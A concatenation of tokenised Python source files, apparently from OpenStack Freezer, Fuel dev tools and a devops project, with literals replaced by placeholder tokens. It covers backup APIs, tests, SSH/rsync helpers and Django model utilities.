'<STR_LIT>' : os . path . join ( os . getcwd ( ) , args . conf ) } <EOL> if _add_to_list ( args . engine , '<STR_LIT>' , args . 
name , ** audit_cfg_args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> def unregister_audit ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not args . name and args . engine : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> _remove_from_list ( args . engine , '<STR_LIT>' , args . name ) <EOL> def register_repair ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not ( args . conf and args . name and args . engine ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> repair_cfg_args = { '<STR_LIT>' : os . path . join ( os . getcwd ( ) , args . conf ) } <EOL> if _add_to_list ( args . engine , '<STR_LIT>' , args . name , ** repair_cfg_args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> def unregister_repair ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not args . name and args . engine : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> _remove_from_list ( args . engine , '<STR_LIT>' , args . name ) <EOL> def start_engine ( args ) : <EOL> if not ( args . name and args . engine_cfg ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> utils . create_files ( [ engine_cfg ] ) <EOL> if args . purge : <EOL> utils . purge_disabled ( engine_cfg ) <EOL> if utils . check_exists_and_enabled ( args . name , engine_cfg ) : <EOL> LOG . error ( "<STR_LIT>" <EOL> "<STR_LIT>" , args . name ) <EOL> return <EOL> if utils . check_exists_and_disabled ( args . name , engine_cfg ) : <EOL> LOG . error ( "<STR_LIT>" <EOL> "<STR_LIT>" , args . name ) <EOL> return <EOL> try : <EOL> cfg_data = dict ( utils . load_yaml ( args . engine_cfg ) ) [ args . name ] <EOL> cfg = { <EOL> args . name : { <EOL> '<STR_LIT>' : os . path . join ( os . getcwd ( ) , args . engine_cfg ) , <EOL> '<STR_LIT>' : os . getpid ( ) , <EOL> '<STR_LIT>' : cfg_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : True <EOL> } <EOL> } <EOL> utils . write_yaml ( cfg , engine_cfg ) <EOL> LOG . info ( '<STR_LIT>' , args . 
name ) <EOL> entropy_engine = Engine ( args . name , ** cfg_data ) <EOL> entropy_engine . run ( ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , args . name ) <EOL> return <EOL> def stop_engine ( args ) : <EOL> LOG . info ( "<STR_LIT>" , args . name ) <EOL> utils . disable_engine ( args . name , engine_cfg ) <EOL> def parse ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> subparsers = parser . add_subparsers ( dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , <EOL> action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser . set_defaults ( func = register_audit ) <EOL> unregister_audit_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_audit_parser . set_defaults ( func = unregister_audit ) <EOL> register_repair_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . 
add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_repair_parser . set_defaults ( func = register_repair ) <EOL> unregister_repair_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_repair_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> unregister_repair_parser . set_defaults ( func = unregister_repair ) <EOL> start_engine_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> start_engine_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , help = '<STR_LIT:Name>' ) <EOL> start_engine_parser . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> start_engine_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> start_engine_parser . set_defaults ( func = start_engine ) <EOL> stop_engine_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> stop_engine_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , <EOL> help = "<STR_LIT>" ) <EOL> stop_engine_parser . set_defaults ( func = stop_engine ) <EOL> args = parser . parse_args ( ) <EOL> args . func ( args ) <EOL> def main ( ) : <EOL> console_format = '<STR_LIT>' <EOL> logging . basicConfig ( format = console_format , <EOL> level = logging . INFO ) <EOL> parse ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import falcon <EOL> from freezer_api . api . common import resource <EOL> from freezer_api . common import exceptions as freezer_api_exc <EOL> class ActionsCollectionResource ( resource . BaseResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , storage_driver ) : <EOL> self . db = storage_driver <EOL> def on_get ( self , req , resp ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) <EOL> offset = req . get_param_as_int ( '<STR_LIT>' ) or <NUM_LIT:0> <EOL> limit = req . get_param_as_int ( '<STR_LIT>' ) or <NUM_LIT:10> <EOL> search = self . json_body ( req ) <EOL> obj_list = self . db . search_action ( user_id = user_id , offset = offset , <EOL> limit = limit , search = search ) <EOL> resp . body = { '<STR_LIT>' : obj_list } <EOL> def on_post ( self , req , resp ) : <EOL> doc = self . json_body ( req ) <EOL> if not doc : <EOL> raise freezer_api_exc . BadDataFormat ( <EOL> message = '<STR_LIT>' ) <EOL> user_id = req . get_header ( '<STR_LIT>' ) <EOL> action_id = self . db . add_action ( user_id = user_id , doc = doc ) <EOL> resp . status = falcon . HTTP_201 <EOL> resp . body = { '<STR_LIT>' : action_id } <EOL> class ActionsResource ( resource . BaseResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , storage_driver ) : <EOL> self . db = storage_driver <EOL> def on_get ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> obj = self . db . get_action ( user_id = user_id , action_id = action_id ) <EOL> if obj : <EOL> resp . body = obj <EOL> else : <EOL> resp . status = falcon . HTTP_404 <EOL> def on_delete ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) <EOL> self . db . delete_action ( user_id = user_id , action_id = action_id ) <EOL> resp . body = { '<STR_LIT>' : action_id } <EOL> resp . status = falcon . HTTP_204 <EOL> def on_patch ( self , req , resp , action_id ) : <EOL> user_id = req . 
get_header ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> doc = self . json_body ( req ) <EOL> new_version = self . db . update_action ( user_id = user_id , <EOL> action_id = action_id , <EOL> patch_doc = doc ) <EOL> resp . body = { '<STR_LIT>' : action_id , '<STR_LIT:version>' : new_version } <EOL> def on_post ( self , req , resp , action_id ) : <EOL> user_id = req . get_header ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> doc = self . json_body ( req ) <EOL> new_version = self . db . replace_action ( user_id = user_id , <EOL> action_id = action_id , <EOL> doc = doc ) <EOL> resp . status = falcon . HTTP_201 <EOL> resp . body = { '<STR_LIT>' : action_id , '<STR_LIT:version>' : new_version } </s>
<s> import json <EOL> from freezer_api . tests . freezer_api_tempest_plugin . tests . api import base <EOL> from tempest import test <EOL> class TestFreezerApiSessions ( base . BaseFreezerApiTest ) : <EOL> @ classmethod <EOL> def resource_setup ( cls ) : <EOL> super ( TestFreezerApiSessions , cls ) . resource_setup ( ) <EOL> @ classmethod <EOL> def resource_cleanup ( cls ) : <EOL> super ( TestFreezerApiSessions , cls ) . resource_cleanup ( ) <EOL> @ test . attr ( type = "<STR_LIT>" ) <EOL> def test_api_sessions ( self ) : <EOL> resp , response_body = self . freezer_api_client . get_sessions ( ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status ) <EOL> response_body_json = json . loads ( response_body ) <EOL> self . assertIn ( '<STR_LIT>' , response_body_json ) <EOL> sessions = response_body_json [ '<STR_LIT>' ] <EOL> self . assertEqual ( [ ] , sessions ) <EOL> @ test . attr ( type = "<STR_LIT>" ) <EOL> def test_api_sessions_post ( self ) : <EOL> session = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> "<STR_LIT>" : [ <EOL> { '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:result>" : "<STR_LIT:success>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:result>" : "<STR_LIT:success>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : 
<NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT:result>" : "<STR_LIT:success>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> resp , response_body = self . freezer_api_client . post_sessions ( session ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status ) <EOL> self . assertIn ( '<STR_LIT>' , response_body ) <EOL> session_id = response_body [ '<STR_LIT>' ] <EOL> resp , response_body = self . freezer_api_client . get_sessions ( session_id ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp . status ) <EOL> resp , response_body = self . freezer_api_client . delete_sessions ( <EOL> session_id ) <EOL> self . assertEqual ( <NUM_LIT> , resp . status ) </s>
<s> from django . conf . urls import patterns <EOL> from django . conf . urls import url <EOL> from disaster_recovery . backups import views <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . RestoreView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import sys <EOL> import os <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> from oslo_config import cfg <EOL> from oslo_log import log <EOL> from freezer . utils import utils <EOL> CONF = cfg . CONF <EOL> logging = log . getLogger ( __name__ ) <EOL> home = os . path . expanduser ( "<STR_LIT>" ) <EOL> class BackupOs : <EOL> def __init__ ( self , client_manager , container , storage ) : <EOL> """<STR_LIT>""" <EOL> self . client_manager = client_manager <EOL> self . container = container <EOL> self . storage = storage <EOL> def backup_nova ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> instance_id = instance_id <EOL> client_manager = self . client_manager <EOL> nova = client_manager . get_nova ( ) <EOL> instance = nova . servers . get ( instance_id ) <EOL> glance = client_manager . get_glance ( ) <EOL> if instance . __dict__ [ '<STR_LIT>' ] : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> instance = nova . servers . get ( instance ) <EOL> image_id = nova . servers . create_image ( instance , <EOL> "<STR_LIT>" % instance_id ) <EOL> image = glance . images . get ( image_id ) <EOL> while image . status != '<STR_LIT>' : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> try : <EOL> image = glance . images . get ( image_id ) <EOL> except Exception as e : <EOL> logging . error ( e ) <EOL> stream = client_manager . download_image ( image ) <EOL> package = "<STR_LIT>" . format ( instance_id , utils . DateTime . now ( ) . timestamp ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> headers = { "<STR_LIT>" : instance . _info [ '<STR_LIT:name>' ] , <EOL> "<STR_LIT>" : instance . _info [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] } <EOL> self . storage . add_stream ( stream , package , headers ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> glance . images . delete ( image ) <EOL> def backup_cinder_by_glance ( self , volume_id ) : <EOL> """<STR_LIT>""" <EOL> client_manager = self . client_manager <EOL> cinder = client_manager . get_cinder ( ) <EOL> volume = cinder . volumes . get ( volume_id ) <EOL> logging . 
debug ( "<STR_LIT>" ) <EOL> snapshot = client_manager . provide_snapshot ( <EOL> volume , "<STR_LIT>" % volume_id ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> copied_volume = client_manager . do_copy_volume ( snapshot ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> image = client_manager . make_glance_image ( "<STR_LIT:name>" , copied_volume ) <EOL> logging . debug ( "<STR_LIT>" . format ( image . id ) ) <EOL> stream = client_manager . download_image ( image ) <EOL> package = "<STR_LIT>" . format ( volume_id , utils . DateTime . now ( ) . timestamp ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> headers = { } <EOL> self . storage . add_stream ( stream , package , headers = headers ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> client_manager . clean_snapshot ( snapshot ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> cinder . volumes . delete ( copied_volume ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> client_manager . get_glance ( ) . images . delete ( image . id ) <EOL> def backup_cinder ( self , volume_id , name = None , description = None ) : <EOL> client_manager = self . client_manager <EOL> cinder = client_manager . get_cinder ( ) <EOL> search_opts = { <EOL> '<STR_LIT>' : volume_id , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> } <EOL> backups = cinder . backups . list ( search_opts = search_opts ) <EOL> if len ( backups ) > <NUM_LIT:0> : <EOL> incremental = True <EOL> else : <EOL> incremental = False <EOL> container = "<STR_LIT>" . format ( self . container , volume_id , <EOL> utils . DateTime . now ( ) . timestamp ) <EOL> cinder . backups . create ( volume_id , container , name , description , <EOL> incremental = incremental , force = True ) </s>
<s> import subprocess <EOL> from freezer . tests . freezer_tempest_plugin . tests . api import base <EOL> from freezer import __version__ as FREEZER_VERSION <EOL> from tempest import test <EOL> class TestFreezerVersion ( base . BaseFreezerTest ) : <EOL> @ test . attr ( type = "<STR_LIT>" ) <EOL> def test_version ( self ) : <EOL> version = subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stderr = subprocess . STDOUT ) <EOL> self . assertEqual ( FREEZER_VERSION , version . strip ( ) ) </s>
import unittest

from freezer.openstack import openstack
from freezer.openstack import osclients
from freezer.storage import swift
from freezer.storage import base


class TestSwiftStorage(unittest.TestCase):
    """Tests for parsing Swift object listings into ``base.Backup`` trees."""

    def setUp(self):
        # skip_prepare=True: do not touch a real Swift endpoint during tests.
        self.storage = swift.SwiftStorage(
            osclients.ClientManager(
                openstack.OpenstackOptions.create_from_env()
            ),
            "<STR_LIT>",
            "<STR_LIT>",
            <NUM_LIT:100>, skip_prepare=True
        )
        # One full backup together with its tar metadata object.
        self.files = [
            "<STR_LIT>",
            "<STR_LIT>",
        ]
        # A full backup plus a level-1 increment (each with tar metadata).
        self.increments = [
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
        ]
        # Two backup cycles, each a full backup with a level-1 increment.
        self.cycles_increments = [
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
            "<STR_LIT>",
        ]
        # Expected Backup objects the parser should reconstruct from the
        # listings above.
        self.backup = base.Backup(self.storage,
                                  "<STR_LIT>", <NUM_LIT:1000>, tar_meta=True, )
        self.backup_2 = base.Backup(self.storage,
                                    "<STR_LIT>", <NUM_LIT>, tar_meta=True)
        self.increment = base.Backup(self.storage,
                                     "<STR_LIT>", <NUM_LIT>,
                                     full_backup=self.backup,
                                     level=<NUM_LIT:1>,
                                     tar_meta=True)
        self.increment_2 = base.Backup(self.storage,
                                       "<STR_LIT>", <NUM_LIT>,
                                       full_backup=self.backup_2,
                                       level=<NUM_LIT:1>,
                                       tar_meta=True)

    def test__get_backups(self):
        """A full backup with metadata parses into exactly one Backup."""
        backups = base.Backup.parse_backups(self.files, self.storage)
        self.assertEqual(<NUM_LIT:1>, len(backups))
        backup = backups[<NUM_LIT:0>]
        self.assertEqual(self.backup, backup)

    def test__get_backups_with_tar_only(self):
        """A tar metadata object alone must not be reported as a backup."""
        backups = base.Backup.parse_backups(
            ["<STR_LIT>"], self.storage)
        self.assertEqual(<NUM_LIT:0>, len(backups))

    def test__get_backups_without_tar(self):
        """A data object without metadata parses with tar_meta unset."""
        backups = base.Backup.parse_backups(["<STR_LIT>"],
                                            self.storage)
        self.assertEqual(<NUM_LIT:1>, len(backups))
        # Adjust the expectation: no metadata object was listed.
        self.backup.tar_meta = False
        backup = backups[<NUM_LIT:0>]
        self.assertEqual(self.backup, backup)

    def test__get_backups_increment(self):
        """An increment is attached to its full backup, not listed alone."""
        backups = base.Backup.parse_backups(self.increments, self.storage)
        self.assertEqual(<NUM_LIT:1>, len(backups))
        self.backup.add_increment(self.increment)
        backup = backups[<NUM_LIT:0>]
        self.assertEqual(self.backup, backup)

    def test__get_backups_increments(self):
        """Two cycles parse into two fulls, each with its own increment."""
        backups = base.Backup.parse_backups(self.cycles_increments,
                                            self.storage)
        self.assertEqual(<NUM_LIT:2>, len(backups))
        self.backup.add_increment(self.increment)
        self.backup_2.add_increment(self.increment_2)
        self.assertEqual(self.backup, backups[<NUM_LIT:0>])
        self.assertEqual(self.backup_2, backups[<NUM_LIT:1>])
from fabric import api as fabric_api

from fuel_dev_tools import cmd_parser


class SlavesMixin(cmd_parser.CmdParserMixin):
    """Helpers for reaching slave nodes through the master node."""

    def discover_slaves(self):
        """Return the parsed listing of slave nodes known to the master."""
        raw_listing = self.ssh_command('<STR_LIT>', '<STR_LIT>')
        return self.parse_output(raw_listing)

    def rsync_slave(self, slave, source, target):
        """Rsync *source* onto *slave*'s *target*, hopping via the master."""
        self.print_debug('<STR_LIT>'.format(**slave))
        destination = '<STR_LIT>'.format(target)
        # The transfer is tunnelled through the master node, so rsync gets
        # an extra proxy-command argument pair.
        proxy_cmd = '<STR_LIT>'.format(
            self.app_args.ip,
            self.app_args.port,
            slave['<STR_LIT>'],
        )
        self.rsync(source, destination, '<STR_LIT>', proxy_cmd)

    def slave_command(self, slave, *cmd):
        """Run *cmd* on *slave* over a two-hop SSH through the master."""
        ssh_prefix = [
            '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
            '<STR_LIT>'.format(self.app_args.user, self.app_args.ip),
            '<STR_LIT>', self.app_args.port,
            '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
            '<STR_LIT>'.format(**slave),
        ]
        full_command = ssh_prefix + list(cmd)
        return fabric_api.run('<STR_LIT:U+0020>'.join(full_command))
import abc
from datetime import datetime
from functools import reduce
import operator

from django.db import models
from django.db.models.base import ModelBase
from django.db.models import query
import jsonfield
import six

from devops.error import DevopsError
from devops.helpers.helpers import deepgetattr
from devops.helpers import loader


def choices(*args, **kwargs):
    """Return a CharField whose choices are exactly the given *args*.

    Each arg is used both as the stored value and the display value.
    Extra *kwargs* override the CharField defaults.
    """
    defaults = {'<STR_LIT:max_length>': <NUM_LIT:255>, '<STR_LIT:null>': False}
    defaults.update(kwargs)
    defaults.update(choices=list(zip(args, args)))
    return models.CharField(**defaults)


class BaseModel(models.Model):
    """Abstract base model that records its creation time."""

    class Meta(object):
        abstract = True

    # NOTE(review): datetime.utcnow yields a naive datetime; if Django's
    # USE_TZ is enabled this mixes naive and aware values — confirm.
    created = models.DateTimeField(default=datetime.utcnow)


class ParamedModelType(ModelBase):
    """Metaclass that wires ParamFieldBase descriptors into Django models.

    Subclasses of ParamedModel become Django proxy models, and every
    ParamFieldBase attribute they declare is registered so its value can
    be stored in the instance's ``params`` JSON field.
    """

    def __new__(cls, name, bases, attrs):
        super_new = super(ParamedModelType, cls).__new__
        if name != '<STR_LIT>' and name != '<STR_LIT>':
            # Flatten the MROs of all bases to detect indirect subclasses.
            parents = reduce(operator.add, map(lambda a: a.__mro__, bases))
            if ParamedModel not in bases and ParamedModel in parents:
                # Indirect subclasses share the parent's DB table: force
                # them to be Django proxy models.
                if '<STR_LIT:Meta>' not in attrs:
                    attrs['<STR_LIT:Meta>'] = type('<STR_LIT:Meta>', (object,), {})
                Meta = attrs['<STR_LIT:Meta>']
                Meta.proxy = True
        new_class = super_new(cls, name, bases, attrs)
        # Record which attributes are param descriptors, and tell each
        # descriptor the key it lives under inside ``params``.
        new_class._param_field_names = []
        for attr_name in attrs:
            attr = attrs[attr_name]
            if isinstance(attr, ParamFieldBase):
                attr.set_param_key(attr_name)
                new_class._param_field_names.append(attr_name)
        return new_class

    def __call__(cls, *args, **kwargs):
        # Split constructor kwargs: param-descriptor values must not reach
        # Django's Model.__init__, which only accepts real fields.
        kwargs_for_params = {}
        defined_params = cls.get_defined_params()
        for param in defined_params:
            if param in kwargs:
                kwargs_for_params[param] = kwargs.pop(param)
        obj = super(ParamedModelType, cls).__call__(*args, **kwargs)
        # ``_class`` stores the dotted path of the concrete subclass;
        # re-cast the fresh instance to that class when present.
        if obj._class:
            Cls = loader.load_class(obj._class)
            obj.__class__ = Cls
        # Apply the param values only after the final class is in place.
        for param in kwargs_for_params:
            setattr(obj, param, kwargs_for_params[param])
        return obj


@six.add_metaclass(abc.ABCMeta)
class ParamFieldBase(object):
    """Abstract descriptor for values stored in a model's ``params`` JSON."""

    def __init__(self):
        # Set later by the metaclass via set_param_key().
        self.param_key = None

    def set_param_key(self, param_key):
        """Remember the attribute name used as the key inside ``params``."""
        self.param_key = param_key

    @abc.abstractmethod
    def set_default_value(self, instance):
        """Seed the instance's params dict with this field's default."""
        return

    @abc.abstractmethod
    def __get__(self, instance, cls):
        return

    @abc.abstractmethod
    def __set__(self, instance, values):
        return

    def __delete__(self, instance):
        # Param values cannot be removed once declared.
        raise AttributeError("<STR_LIT>")


class ParamField(ParamFieldBase):
    """Scalar param descriptor with an optional default and choice set."""

    def __init__(self, default=None, choices=None):
        super(ParamField, self).__init__()
        # The default itself must be an allowed choice.
        if choices and default not in choices:
            raise DevopsError('<STR_LIT>')
        self.default_value = default
        self.choices = choices

    def set_default_value(self, instance):
        # setdefault: never overwrite a value that is already stored.
        instance.params.setdefault(self.param_key, self.default_value)

    def __get__(self, instance, cls):
        return instance.params.get(self.param_key, self.default_value)

    def __set__(self, instance, value):
        if self.choices and value not in self.choices:
            raise DevopsError('<STR_LIT>'
                              '<STR_LIT>'.format(self.param_key))
        instance.params[self.param_key] = value


class ParamMultiField(ParamFieldBase):
    """Nested param descriptor grouping several sub-fields under one key.

    Access goes through a generated proxy object whose class carries the
    sub-field descriptors; the proxy's ``params`` dict is re-bound to the
    owning instance's nested dict on every access.
    """

    def __init__(self, **subfields):
        super(ParamMultiField, self).__init__()
        if len(subfields) == <NUM_LIT:0>:
            raise DevopsError('<STR_LIT>')
        self.subfields = []
        for name, field in subfields.items():
            if not isinstance(field, (ParamField, ParamMultiField)):
                raise DevopsError('<STR_LIT>'
                                  '<STR_LIT>'
                                  '<STR_LIT>'.format(name))
            field.set_param_key(name)
            self.subfields.append(field)
        self.choices = None
        self._proxy = None
        self.proxy_fields = {field.param_key: field
                             for field in self.subfields}
        # Build a one-off class holding the sub-field descriptors.
        # NOTE(review): the proxy instance is shared by all model instances
        # and only its ``params`` is swapped per access — confirm this is
        # safe for the intended (single-threaded) usage.
        Proxy = type('<STR_LIT>', (object,), self.proxy_fields)
        self._proxy = Proxy()

    def set_default_value(self, instance):
        for field in self.subfields:
            self._init_proxy_params(instance)
            field.set_default_value(self._proxy)

    def _init_proxy_params(self, instance):
        # Ensure the nested dict exists and point the proxy at it.
        instance.params.setdefault(self.param_key, dict())
        self._proxy.params = instance.params[self.param_key]

    def __get__(self, instance, cls):
        self._init_proxy_params(instance)
        return self._proxy

    def __set__(self, instance, values):
        # Only whole-dict assignment is supported, and every key must map
        # to a declared sub-field.
        if not isinstance(values, dict):
            raise DevopsError('<STR_LIT>')
        self._init_proxy_params(instance)
        for field_name, field_value in values.items():
            if field_name not in self.proxy_fields:
                raise DevopsError('<STR_LIT>'.format(field_name))
            setattr(self._proxy, field_name, field_value)


class ParamedModelQuerySet(query.QuerySet):
    """QuerySet that lets filter() mix DB fields and JSON param lookups."""

    def __get_all_field_names(self):
        """Collect the names (and attnames) of the model's real DB fields."""
        field_names = set()
        _meta = self.model._meta
        fields = _meta.get_fields()
        for field in fields:
            # Skip generic foreign keys (relations with no related model).
            if field.is_relation and field.many_to_one and field.related_model is None:
                continue
            # Skip fields inherited from a concrete parent's proxy chain.
            if field.model != _meta.model and field.model._meta.concrete_model == _meta.concrete_model:
                continue
            field_names.add(field.name)
            if hasattr(field, '<STR_LIT>'):
                field_names.add(field.attname)
        return field_names

    def filter(self, *args, **kwargs):
        """Filter by DB fields in SQL, then by param lookups in Python."""
        super_filter = super(ParamedModelQuerySet, self).filter
        kwargs_for_params = {}
        db_kwargs = {}
        field_names = self.__get_all_field_names()
        # Route each lookup: known DB field -> SQL, anything else -> params.
        for param in kwargs.keys():
            first_subparam = param.split('<STR_LIT>')[<NUM_LIT:0>]
            if first_subparam not in field_names:
                kwargs_for_params[param] = kwargs[param]
            else:
                db_kwargs[param] = kwargs[param]
        queryset = super_filter(*args, **db_kwargs)
        if not kwargs_for_params:
            return queryset
        # Evaluate the SQL-filtered rows and keep only those whose param
        # values match every remaining lookup (exact equality only).
        result_ids = []
        for item in queryset:
            for key, value in kwargs_for_params.items():
                item_val = deepgetattr(item, key, splitter='<STR_LIT>',
                                       do_raise=True)
                if item_val != value:
                    break
            else:
                result_ids.append(item.id)
        return super_filter(id__in=result_ids)


class ParamedModelManager(models.Manager):
    """Manager returning ParamedModelQuerySet for param-aware filtering."""

    use_for_related_fields = True

    def get_queryset(self):
        return ParamedModelQuerySet(self.model, using=self._db)


class ParamedModel(six.with_metaclass(ParamedModelType, models.Model)):
